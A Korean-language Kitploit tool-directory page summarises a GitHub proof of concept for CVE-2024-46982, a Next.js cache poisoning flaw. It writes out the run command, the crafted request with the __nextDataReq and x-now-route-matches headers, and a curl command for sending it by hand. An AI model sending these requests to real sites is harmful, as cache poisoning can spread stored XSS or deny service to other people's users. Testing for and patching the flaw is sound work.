Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-46982 — POC CVE-2024-46982 | Kitploit
도구/GitHubGitHub/lercas/cve-2024-46982
Vulnerability AnalysisExploitationWeb Application ExploitationWeb Security
GitHublercas/cve-2024-46982

CVE-2024-46982

POC CVE-2024-46982

저장소 보기
5111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Next.js 캐시 포이즈닝 익스플로잇

이 도구는 Next.js의 캐시 포이즈닝 취약점인 CVE-2024-46982의 탐지 및 익스플로잇을 자동화합니다. 이 취약점은 서버사이드 렌더링(SSR) 응답이 정적 사이트 생성(SSG)으로 잘못 캐시되는 문제입니다. 이러한 구성 오류는 저장형 XSS, DoS, 데이터 유출로 이어질 수 있으며, 공격자가 캐시된 응답에 악성 콘텐츠를 주입할 수 있게 합니다.

설치 및 사용법

대상 목록 준비

targets.txt 파일을 생성하고, 한 줄에 하나의 대상 URL을 입력합니다:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

사용자 정의 페이로드 정의

payloads.txt 파일을 생성하고, User-Agent 헤더를 통해 주입될 페이로드를 입력합니다:

root@kitploit:~

익스플로잇 실행

다음 명령어로 컴파일 및 실행합니다:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

작동 방식

  • targets.txt에서 대상 URL 목록을 읽음
  • 각 대상을 반복하며 취약한 엔드포인트를 추가:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • payloads.txt의 다양한 페이로드를 각각 사용하여 여러 요청을 전송
  • HTTP 응답을 분석하여 성공적인 주입의 징후를 확인:
    • 페이로드가 응답 본문에 나타나면 → 대상은 취약함
    • 응답 코드가 200 OK이고 캐싱 동작이 비정상적이면 → 잠재적으로 취약함
    • 응답 코드가 403 Forbidden 또는 404 Not Found이면 → 패치되었을 가능성 높음
  • 모든 대상 테스트 후 결과 표시

수동 확인 방법:

다음 curl 명령어를 사용하여 악성 요청 전송:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

브라우저에서 엔드포인트 방문

요구 사항

  • Go 1.21 이상
도구 다운로드